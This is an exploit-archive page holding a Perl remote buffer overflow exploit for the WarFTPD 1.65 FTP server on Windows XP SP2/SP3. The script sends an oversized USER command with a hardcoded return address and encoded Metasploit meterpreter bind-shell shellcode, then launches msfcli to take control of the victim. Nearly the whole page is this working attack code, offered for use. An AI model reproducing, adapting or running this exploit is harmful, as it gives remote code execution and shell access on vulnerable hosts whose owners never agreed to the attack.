首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WarFTPD 1.65 (USER) Remote Buffer Overflow Exploit
来源:http://www.p0wnbox.com 作者:mr.pr0n 发布时间:2010-06-28  

# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]
# Date: 26/6/2010
# Author: mr.pr0n
# Software Link:
# Version: WarFTPD 1.65
# Tested on: Windows XP Pro SP2 / SP3 [English]
# CVE :
# Code :
 
#!/usr/bin/perl

use IO::Socket;

print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n";
print "#    Target App: WarFTPD 1.65  (USER).                    #\n";
print "#    Attack    : Remote Buffer Overflow Exploit.             #\n";
print "#    Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3].    #\n";
print "#----------------------------------------[http://www.p0wnbox.com]-------#\n";
print "\nEnter your target's IP (e.g.: 192.168.0.123)\n";
print "> ";
$target=<STDIN>;
chomp($target);
print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n";
print "> ";
$sp=<STDIN>;
chomp($sp);

if ($sp == 2) {
          # Lets define the RET, if our target is Windows SP2.
          $RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret
          }
          elsif ($sp == 3)
            {
                        # Lets define the RET, if our target is Windows SP3.
            $RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret
            }
else {
     print "[-] Wrong version of Windows XP Service Pack!\n";
     exit(1);
     }

# We need 485 bytes to override the EIP.
$junkBytes     = "\x41" x 485; # Send 485 "A".

# We need 569 bytes to override the Seh Handler.
$junkBytes_2     = "\x41" x 84; # Send(485 + 84 =)569 "A".


#-----------------------------------------------------------------------------------------------------------------------#
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444  R | msfencode -b '\x00\x0a\x0d\x40' -t c    #
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)                                 #
#-----------------------------------------------------------------------------------------------------------------------#

#-----------------------------------------------#
# windows/meterpreter/bind_tcp - 326 bytes     #
# http://www.metasploit.com             #
# Encoder: x86/shikata_ga_nai             #
# Bad Characters: \x00, \x0a, \x0d, \x40     #
# LPORT=4444                     #
#-----------------------------------------------#

$shellcode =
"\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09".
"\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80".
"\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16".
"\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a".
"\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b".
"\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85".
"\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49".
"\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0".
"\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f".
"\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6".
"\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5".
"\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f".
"\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd".
"\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08".
"\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87".
"\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20".
"\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66".
"\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d".
"\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f".
"\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8".
"\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8".
"\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";

if ($socket = IO::Socket::INET->new
     (PeerAddr => $target,
         # Default FTP Port!
     PeerPort => "21",
     Proto => "TCP"))
        {
        print "\n[*] Sending Buffer at: $target ...\n";
                # This is our Buffer, we are sending a long username with the USER ftp command.
        $exploit  = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode;
        print $socket $exploit."\r\n";
                # Hey, wait only for a sec!
        sleep(1);
        close($socket);
        print "[*] Exploitation Done!\n";

                # Connect to the victim with metasploit.
                $command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n";
                system ($command);
        }

else
    {
    print "[-] Connection to $target failed!\n";
    }



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox 3.6.4 Denial o
·Free MP3 CD Ripper 1.0 (0day)
·Linux perl-5.003-8/-9 Local Bu
·UFO: Alien Invasion v2.2.1 Rem
·Flock Browser 2.6.0 Denial of
·Netartmedia iBoutique.MALL SQL
·Scite Text Editor v1.76 Local
·Linux/ARM - execve("/bin/sh","
·RM Downloader 3.1.3 Buffer Ove
·GSM SIM Utility sms file Local
·BlazeDVD v6.0 Buffer Overflow
·MemDb Multiple Remote Dos
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved